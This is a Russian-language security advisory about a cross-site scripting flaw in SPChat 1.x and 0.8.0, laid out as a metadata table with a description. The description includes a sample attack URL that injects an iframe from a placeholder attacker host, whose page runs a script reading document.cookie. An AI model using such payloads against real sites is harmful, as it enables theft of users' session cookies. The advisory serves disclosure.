| Дата публикации: | 06.06.2003 | 
| Всего просмотров: | 1578 | 
| Опасность: | Низкая | 
| Наличие исправления: | Нет | 
| Количество уязвимостей: | 1 | 
| CVE ID: | Нет данных | 
| Вектор эксплуатации: | Удаленная | 
| Воздействие: | Межсайтовый скриптинг | 
| CWE ID: | Нет данных | 
| Наличие эксплоита: | Нет данных | 
| Уязвимые продукты: | Saarport SPChat 1.x | 
| Описание: | Уязвимость в проверке правильности ввода обнаружена в SPChat. Удаленный пользователь может выполнить XSS нападение. XyborG сообщает, что удаленный пользователь может сконструировать специально обработанный URL, который, когда будет загружен в браузере целевого пользователя, выполнит произвольный код сценария в контексте SPChat сайта. Пример: http://[target]/modules.php?op=modload&name=SPChat&file=index&statussess= <IF RAME%20src="http://[attacher]/attack.htm"где http://[attacher]/attack.htm <script> alert(document.cookie); </script>Уязвимость обнаружена в SPChat 0.8.0 | 
| Ссылки: | Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0 |